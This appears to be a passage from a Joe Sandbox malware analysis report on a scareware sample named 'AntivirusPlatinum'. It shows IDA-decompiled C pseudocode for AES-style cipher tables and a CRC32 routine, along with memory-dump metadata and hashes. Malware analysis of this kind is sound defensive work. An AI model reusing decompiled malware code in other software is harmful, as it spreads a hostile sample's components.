                                                                                                                                                  				 *(_t129 + 0x415caa) = _t161;
                                                                                                                                                  				 *(_t129 + 0x4160a9) = _t161;
                                                                                                                                                  				 *(_t129 + 0x4164a8) = _t161;
                                                                                                                                                  				 *(_t129 + 0x4168ab) = _t161;
                                                                                                                                                  				if(_t106 == 0) {
                                                                                                                                                  					_t162 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t162 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t102 + 0x416ca8) = _t162;
                                                                                                                                                  				 *(_t102 + 0x4170ab) = _t162;
                                                                                                                                                  				 *(_t102 + 0x4174aa) = _t162;
                                                                                                                                                  				 *(_t102 + 0x4178a9) = _t162;
                                                                                                                                                  				 *(_t129 + 0x415ca8) = _t162;
                                                                                                                                                  				 *(_t129 + 0x4160ab) = _t162;
                                                                                                                                                  				 *(_t129 + 0x4164aa) = _t162;
                                                                                                                                                  				 *(_t129 + 0x4168a9) = _t162;
                                                                                                                                                  				if(_t106 == 0) {
                                                                                                                                                  					_t163 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t163 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t102 + 0x416ca9) = _t163;
                                                                                                                                                  				 *(_t102 + 0x4170a8) = _t163;
                                                                                                                                                  				 *(_t102 + 0x4174ab) = _t163;
                                                                                                                                                  				 *(_t102 + 0x4178aa) = _t163;
                                                                                                                                                  				 *(_t129 + 0x415ca9) = _t163;
                                                                                                                                                  				 *(_t129 + 0x4160a8) = _t163;
                                                                                                                                                  				 *(_t129 + 0x4164ab) = _t163;
                                                                                                                                                  				 *(_t129 + 0x4168aa) = _t163;
                                                                                                                                                  				if(_t106 == 0) {
                                                                                                                                                  					_t164 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t164 =  *(_t183 + ( *(_t183 + _t182 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
                                                                                                                                                  				}
                                                                                                                                                  				_v8 = _v8 + 1;
                                                                                                                                                  				 *(_t102 + 0x416cab) = _t164;
                                                                                                                                                  				 *(_t102 + 0x4170aa) = _t164;
                                                                                                                                                  				 *(_t102 + 0x4174a9) = _t164;
                                                                                                                                                  				 *(_t102 + 0x4178a8) = _t164;
                                                                                                                                                  				 *(_t129 + 0x415cab) = _t164;
                                                                                                                                                  				 *(_t129 + 0x4160aa) = _t164;
                                                                                                                                                  				 *(_t129 + 0x4164a9) = _t164;
                                                                                                                                                  				 *(_t129 + 0x4168a8) = _t164;
                                                                                                                                                  				if(_v8 < 0x100) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				return _t102;
                                                                                                                                                  				L5:
                                                                                                                                                  				_t105 = _v8;
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}
























                                                                                                                                                  0x00409ded
                                                                                                                                                  0x00409def
                                                                                                                                                  0x00409df6
                                                                                                                                                  0x00409dfe
                                                                                                                                                  0x00409e05
                                                                                                                                                  0x00409e0c
                                                                                                                                                  0x00409e13
                                                                                                                                                  0x00409e16
                                                                                                                                                  0x00409e1f
                                                                                                                                                  0x00409e21
                                                                                                                                                  0x00409e26
                                                                                                                                                  0x00409e29
                                                                                                                                                  0x00409e33
                                                                                                                                                  0x00409e35
                                                                                                                                                  0x00409e3f
                                                                                                                                                  0x00409e41
                                                                                                                                                  0x00409e42
                                                                                                                                                  0x00409e47
                                                                                                                                                  0x00409e49
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409e51
                                                                                                                                                  0x00409e53
                                                                                                                                                  0x00409e6d
                                                                                                                                                  0x00409e55
                                                                                                                                                  0x00409e68
                                                                                                                                                  0x00409e68
                                                                                                                                                  0x00409e87
                                                                                                                                                  0x00409e8a
                                                                                                                                                  0x00409e91
                                                                                                                                                  0x00409e91
                                                                                                                                                  0x00409e97
                                                                                                                                                  0x00409e9d
                                                                                                                                                  0x00409ea0
                                                                                                                                                  0x00409ea2
                                                                                                                                                  0x00409ea8
                                                                                                                                                  0x00409eae
                                                                                                                                                  0x00409eb4
                                                                                                                                                  0x00409eba
                                                                                                                                                  0x00409ec0
                                                                                                                                                  0x00409ec6
                                                                                                                                                  0x00409edd
                                                                                                                                                  0x00409ec8
                                                                                                                                                  0x00409ed3
                                                                                                                                                  0x00409ed3
                                                                                                                                                  0x00409edf
                                                                                                                                                  0x00409ee5
                                                                                                                                                  0x00409eeb
                                                                                                                                                  0x00409ef1
                                                                                                                                                  0x00409ef9
                                                                                                                                                  0x00409f10
                                                                                                                                                  0x00409efb
                                                                                                                                                  0x00409f06
                                                                                                                                                  0x00409f06
                                                                                                                                                  0x00409f12
                                                                                                                                                  0x00409f18
                                                                                                                                                  0x00409f1e
                                                                                                                                                  0x00409f24
                                                                                                                                                  0x00409f2a
                                                                                                                                                  0x00409f45
                                                                                                                                                  0x00409f79
                                                                                                                                                  0x00409f47
                                                                                                                                                  0x00409f75
                                                                                                                                                  0x00409f75
                                                                                                                                                  0x00409f7e
                                                                                                                                                  0x00409f86
                                                                                                                                                  0x00409f9d
                                                                                                                                                  0x00409f88
                                                                                                                                                  0x00409f93
                                                                                                                                                  0x00409f93
                                                                                                                                                  0x00409f9f
                                                                                                                                                  0x00409fa4
                                                                                                                                                  0x00409fa7
                                                                                                                                                  0x00409fad
                                                                                                                                                  0x00409fb3
                                                                                                                                                  0x00409fb9
                                                                                                                                                  0x00409fbf
                                                                                                                                                  0x00409fc5
                                                                                                                                                  0x00409fcb
                                                                                                                                                  0x00409fd1
                                                                                                                                                  0x00409fd9
                                                                                                                                                  0x00409fed
                                                                                                                                                  0x00409fdb
                                                                                                                                                  0x00409fe3
                                                                                                                                                  0x00409fe3
                                                                                                                                                  0x00409fef
                                                                                                                                                  0x00409ff5
                                                                                                                                                  0x00409ffb
                                                                                                                                                  0x0040a001
                                                                                                                                                  0x0040a007
                                                                                                                                                  0x0040a00d
                                                                                                                                                  0x0040a013
                                                                                                                                                  0x0040a019
                                                                                                                                                  0x0040a021
                                                                                                                                                  0x0040a035
                                                                                                                                                  0x0040a023
                                                                                                                                                  0x0040a02b
                                                                                                                                                  0x0040a02b
                                                                                                                                                  0x0040a037
                                                                                                                                                  0x0040a03d
                                                                                                                                                  0x0040a043
                                                                                                                                                  0x0040a049
                                                                                                                                                  0x0040a04f
                                                                                                                                                  0x0040a055
                                                                                                                                                  0x0040a05b
                                                                                                                                                  0x0040a061
                                                                                                                                                  0x0040a069
                                                                                                                                                  0x0040a07d
                                                                                                                                                  0x0040a06b
                                                                                                                                                  0x0040a073
                                                                                                                                                  0x0040a073
                                                                                                                                                  0x0040a07f
                                                                                                                                                  0x0040a089
                                                                                                                                                  0x0040a08f
                                                                                                                                                  0x0040a095
                                                                                                                                                  0x0040a09b
                                                                                                                                                  0x0040a0a1
                                                                                                                                                  0x0040a0a7
                                                                                                                                                  0x0040a0ad
                                                                                                                                                  0x0040a0b3
                                                                                                                                                  0x0040a0b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a0c2
                                                                                                                                                  0x00409e4e
                                                                                                                                                  0x00409e4e
                                                                                                                                                  0x00000000

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                  • Instruction ID: 5d2bc7e4f08e954521d2575b6f364abe5586a069ccf0d2dd76d7a464feb089a4
                                                                                                                                                  • Opcode Fuzzy Hash: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                  • Instruction Fuzzy Hash: AE81CF1620E2E18EE71AC73C14A85F73ED20F72104B2E44EE84CE5B2D7D8650A6AC66D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00409B36(void* __ecx, void* __eflags, char _a4, signed int* _a8) {
                                                                                                                                                  				signed int _v5;
                                                                                                                                                  				signed int _v6;
                                                                                                                                                  				signed int _v7;
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v9;
                                                                                                                                                  				signed int _v10;
                                                                                                                                                  				signed int _v11;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v13;
                                                                                                                                                  				signed int _v14;
                                                                                                                                                  				signed int _v15;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v17;
                                                                                                                                                  				signed int _v18;
                                                                                                                                                  				signed int _v19;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				void* _t242;
                                                                                                                                                  				void* _t268;
                                                                                                                                                  				signed int* _t270;
                                                                                                                                                  
                                                                                                                                                  				_t268 = __ecx;
                                                                                                                                                  				E00409970( &_v20, _a4, __ecx + 0xb4);
                                                                                                                                                  				_t270 = _a8;
                                                                                                                                                  				 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                  				_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                  				_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                  				_t242 = _t268 + 0xa4;
                                                                                                                                                  				_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                  				_a4 = 8;
                                                                                                                                                  				do {
                                                                                                                                                  					E00409970( &_v20, _t270, _t242);
                                                                                                                                                  					 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                  					_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                  					_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                  					_t242 = _t242 - 0x10;
                                                                                                                                                  					_t109 =  &_a4;
                                                                                                                                                  					 *_t109 = _a4 - 1;
                                                                                                                                                  					_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                  				} while ( *_t109 != 0);
                                                                                                                                                  				E00409970( &_v20, _t270, _t268 + 0x24);
                                                                                                                                                  				_t115 = (_v20 & 0x000000ff) + 0x418cc8; // 0x8239e37c
                                                                                                                                                  				 *_t270 =  *_t115;
                                                                                                                                                  				_t270[0] =  *((intOrPtr*)((_v7 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[0] =  *((intOrPtr*)((_v10 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[0] =  *((intOrPtr*)((_v13 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t126 = (_v16 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                  				_t270[1] =  *_t126;
                                                                                                                                                  				_t270[1] =  *((intOrPtr*)((_v19 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[1] =  *((intOrPtr*)((_v6 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[1] =  *((intOrPtr*)((_v9 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t138 = (_v12 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                  				_t270[2] =  *_t138;
                                                                                                                                                  				_t270[2] =  *((intOrPtr*)((_v15 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[2] =  *((intOrPtr*)((_v18 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[2] =  *((intOrPtr*)((_v5 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[3] =  *((intOrPtr*)((_v8 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[3] =  *((intOrPtr*)((_v11 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[3] =  *((intOrPtr*)((_v14 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				_t270[3] =  *((intOrPtr*)((_v17 & 0x000000ff) + 0x418cc8));
                                                                                                                                                  				return E00409970(_t270, _t270, _t268 + 0x14);
                                                                                                                                                  			}






















                                                                                                                                                  0x00409b3f
                                                                                                                                                  0x00409b4f
                                                                                                                                                  0x00409b80
                                                                                                                                                  0x00409b87
                                                                                                                                                  0x00409bb5
                                                                                                                                                  0x00409be4
                                                                                                                                                  0x00409c0f
                                                                                                                                                  0x00409c15
                                                                                                                                                  0x00409c18
                                                                                                                                                  0x00409c1f
                                                                                                                                                  0x00409c25
                                                                                                                                                  0x00409c5a
                                                                                                                                                  0x00409c88
                                                                                                                                                  0x00409cb7
                                                                                                                                                  0x00409ce2
                                                                                                                                                  0x00409ce5
                                                                                                                                                  0x00409ce5
                                                                                                                                                  0x00409ce8
                                                                                                                                                  0x00409ce8
                                                                                                                                                  0x00409cfa
                                                                                                                                                  0x00409d03
                                                                                                                                                  0x00409d09
                                                                                                                                                  0x00409d15
                                                                                                                                                  0x00409d22
                                                                                                                                                  0x00409d2f
                                                                                                                                                  0x00409d36
                                                                                                                                                  0x00409d3c
                                                                                                                                                  0x00409d49
                                                                                                                                                  0x00409d56
                                                                                                                                                  0x00409d63
                                                                                                                                                  0x00409d6a
                                                                                                                                                  0x00409d70
                                                                                                                                                  0x00409d7d
                                                                                                                                                  0x00409d8a
                                                                                                                                                  0x00409d97
                                                                                                                                                  0x00409da4
                                                                                                                                                  0x00409db1
                                                                                                                                                  0x00409dbe
                                                                                                                                                  0x00409dd1
                                                                                                                                                  0x00409ddd

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                  • Instruction ID: 7a05ca3c6aa45f7c0c3d5be354b359d1162ea9d394a588887a6fdbb73b53b832
                                                                                                                                                  • Opcode Fuzzy Hash: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                  • Instruction Fuzzy Hash: AE914D648192D46ECB029FB594608FABFF0DE1B211B0E84DEE4E997293D138D364DB74
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E004099A2(intOrPtr __ecx, signed int _a4) {
                                                                                                                                                  				signed int* _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				signed char _v29;
                                                                                                                                                  				signed char _v30;
                                                                                                                                                  				signed char _v31;
                                                                                                                                                  				signed char _v32;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				signed int _v41;
                                                                                                                                                  				signed int _v42;
                                                                                                                                                  				signed int _v43;
                                                                                                                                                  				signed int _v44;
                                                                                                                                                  				signed int _t60;
                                                                                                                                                  				char* _t64;
                                                                                                                                                  				signed int _t65;
                                                                                                                                                  				signed int _t70;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t97;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  
                                                                                                                                                  				_v12 = __ecx;
                                                                                                                                                  				E0040A2B6(__ecx,  &_v44, _a4, 0x20);
                                                                                                                                                  				_t60 = 0;
                                                                                                                                                  				_t72 = 0;
                                                                                                                                                  				_a4 = 0;
                                                                                                                                                  				_t65 = 0;
                                                                                                                                                  				_t73 = 4;
                                                                                                                                                  				while(_t60 <= 0xa) {
                                                                                                                                                  					if(_t65 >= _t73) {
                                                                                                                                                  						L6:
                                                                                                                                                  						_t97 = _t72 - _t73;
                                                                                                                                                  					} else {
                                                                                                                                                  						_v8 = _t91 + _t65 * 4 - 0x28;
                                                                                                                                                  						while(_t72 < _t73) {
                                                                                                                                                  							_v8 = _v8 + _t73;
                                                                                                                                                  							_t65 = _t65 + 1;
                                                                                                                                                  							_t72 = _t72 + 1;
                                                                                                                                                  							asm("movsd");
                                                                                                                                                  							if(_t65 < _t73) {
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L6;
                                                                                                                                                  							}
                                                                                                                                                  							goto L7;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L7:
                                                                                                                                                  					if(_t97 == 0) {
                                                                                                                                                  						_t60 = _t60 + 1;
                                                                                                                                                  						_a4 = _t60;
                                                                                                                                                  						_t72 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t65 < _t73) {
                                                                                                                                                  						continue;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(_t60 <= 0xa) {
                                                                                                                                                  							_v8 = 0x418ca8;
                                                                                                                                                  							do {
                                                                                                                                                  								_v43 = _v43 ^  *((_v30 & 0x000000ff) + 0x418dc8);
                                                                                                                                                  								_v42 = _v42 ^  *((_v29 & 0x000000ff) + 0x418dc8);
                                                                                                                                                  								_v41 = _v41 ^  *((_v32 & 0x000000ff) + 0x418dc8);
                                                                                                                                                  								_v8 =  &(_v8[0]);
                                                                                                                                                  								_v44 = _v44 ^  *((_v31 & 0x000000ff) + 0x418dc8) ^  *_v8;
                                                                                                                                                  								_t64 =  &_v40;
                                                                                                                                                  								_t74 = 3;
                                                                                                                                                  								do {
                                                                                                                                                  									_t85 = 0;
                                                                                                                                                  									do {
                                                                                                                                                  										 *(_t64 + _t85) =  *(_t64 + _t85) ^  *(_t64 + _t85 - 4);
                                                                                                                                                  										_t85 = _t85 + 1;
                                                                                                                                                  									} while (_t85 < _t73);
                                                                                                                                                  									_t64 = _t64 + _t73;
                                                                                                                                                  									_t74 = _t74 - 1;
                                                                                                                                                  								} while (_t74 != 0);
                                                                                                                                                  								_t70 = 0;
                                                                                                                                                  								while(_a4 <= 0xa) {
                                                                                                                                                  									if(_t70 >= _t73) {
                                                                                                                                                  										L22:
                                                                                                                                                  										_t110 = _t72 - _t73;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t60 = _t91 + _t70 * 4 - 0x28;
                                                                                                                                                  										while(_t72 < _t73) {
                                                                                                                                                  											_t70 = _t70 + 1;
                                                                                                                                                  											_t60 = _t60 + _t73;
                                                                                                                                                  											_t72 = _t72 + 1;
                                                                                                                                                  											asm("movsd");
                                                                                                                                                  											if(_t70 < _t73) {
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L22;
                                                                                                                                                  											}
                                                                                                                                                  											goto L23;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									L23:
                                                                                                                                                  									if(_t110 == 0) {
                                                                                                                                                  										_a4 = _a4 + 1;
                                                                                                                                                  										_t72 = 0;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t70 < _t73) {
                                                                                                                                                  										continue;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L26;
                                                                                                                                                  									}
                                                                                                                                                  									goto L27;
                                                                                                                                                  								}
                                                                                                                                                  								goto L27;
                                                                                                                                                  								L26:
                                                                                                                                                  							} while (_a4 <= 0xa);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				L27:
                                                                                                                                                  				return _t60;
                                                                                                                                                  			}

























                                                                                                                                                  0x004099b4
                                                                                                                                                  0x004099b7
                                                                                                                                                  0x004099bc
                                                                                                                                                  0x004099c0
                                                                                                                                                  0x004099c2
                                                                                                                                                  0x004099c5
                                                                                                                                                  0x004099c7
                                                                                                                                                  0x004099c8
                                                                                                                                                  0x004099d3
                                                                                                                                                  0x004099f7
                                                                                                                                                  0x004099f7
                                                                                                                                                  0x004099d5
                                                                                                                                                  0x004099d9
                                                                                                                                                  0x004099dc
                                                                                                                                                  0x004099ed
                                                                                                                                                  0x004099f0
                                                                                                                                                  0x004099f1
                                                                                                                                                  0x004099f4
                                                                                                                                                  0x004099f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004099f5
                                                                                                                                                  0x004099dc
                                                                                                                                                  0x004099f9
                                                                                                                                                  0x004099f9
                                                                                                                                                  0x004099fb
                                                                                                                                                  0x004099fc
                                                                                                                                                  0x004099ff
                                                                                                                                                  0x004099ff
                                                                                                                                                  0x00409a03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409a05
                                                                                                                                                  0x00409a08
                                                                                                                                                  0x00409a0e
                                                                                                                                                  0x00409a15
                                                                                                                                                  0x00409a30
                                                                                                                                                  0x00409a3d
                                                                                                                                                  0x00409a4b
                                                                                                                                                  0x00409a4e
                                                                                                                                                  0x00409a53
                                                                                                                                                  0x00409a56
                                                                                                                                                  0x00409a59
                                                                                                                                                  0x00409a5a
                                                                                                                                                  0x00409a5a
                                                                                                                                                  0x00409a5c
                                                                                                                                                  0x00409a60
                                                                                                                                                  0x00409a63
                                                                                                                                                  0x00409a64
                                                                                                                                                  0x00409a68
                                                                                                                                                  0x00409a6a
                                                                                                                                                  0x00409a6a
                                                                                                                                                  0x00409a6d
                                                                                                                                                  0x00409a6f
                                                                                                                                                  0x00409a77
                                                                                                                                                  0x00409a99
                                                                                                                                                  0x00409a99
                                                                                                                                                  0x00409a79
                                                                                                                                                  0x00409a79
                                                                                                                                                  0x00409a7d
                                                                                                                                                  0x00409a90
                                                                                                                                                  0x00409a91
                                                                                                                                                  0x00409a93
                                                                                                                                                  0x00409a96
                                                                                                                                                  0x00409a97
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409a97
                                                                                                                                                  0x00409a7d
                                                                                                                                                  0x00409a9b
                                                                                                                                                  0x00409a9b
                                                                                                                                                  0x00409a9d
                                                                                                                                                  0x00409aa0
                                                                                                                                                  0x00409aa0
                                                                                                                                                  0x00409aa4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409aa4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409aa6
                                                                                                                                                  0x00409aa6
                                                                                                                                                  0x00409a15
                                                                                                                                                  0x00409a08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409a03
                                                                                                                                                  0x00409ab4
                                                                                                                                                  0x00409ab4

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                  • Instruction ID: 8db506cccaca7ad31332262a737b3017699621a350de5aec0ff0f078f6a8288b
                                                                                                                                                  • Opcode Fuzzy Hash: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                  • Instruction Fuzzy Hash: 7931C872A002D59ECF158FB594905EEBFB1DE69328F29807FC88177282D2355D86CB94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00402CC5(signed char _a4, signed char _a8, unsigned int _a12) {
                                                                                                                                                  				signed char _t28;
                                                                                                                                                  				signed char _t30;
                                                                                                                                                  				signed char _t53;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				unsigned int _t71;
                                                                                                                                                  				unsigned int _t74;
                                                                                                                                                  
                                                                                                                                                  				if( *0x4141c4 == 0) {
                                                                                                                                                  					E00402C9B();
                                                                                                                                                  				}
                                                                                                                                                  				_t53 = _a8;
                                                                                                                                                  				_t28 = _a4;
                                                                                                                                                  				_t74 = _a12;
                                                                                                                                                  				while(_t74 > 0 && (_t53 & 0x00000007) != 0) {
                                                                                                                                                  					_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *_t53 & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                  					_t74 = _t74 - 1;
                                                                                                                                                  					_t53 = _t53 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t74 >= 8) {
                                                                                                                                                  					_t71 = _t74 >> 3;
                                                                                                                                                  					do {
                                                                                                                                                  						_t30 = _t28 ^  *_t53;
                                                                                                                                                  						_t53 = _t53 + 8;
                                                                                                                                                  						_t74 = _t74 - 8;
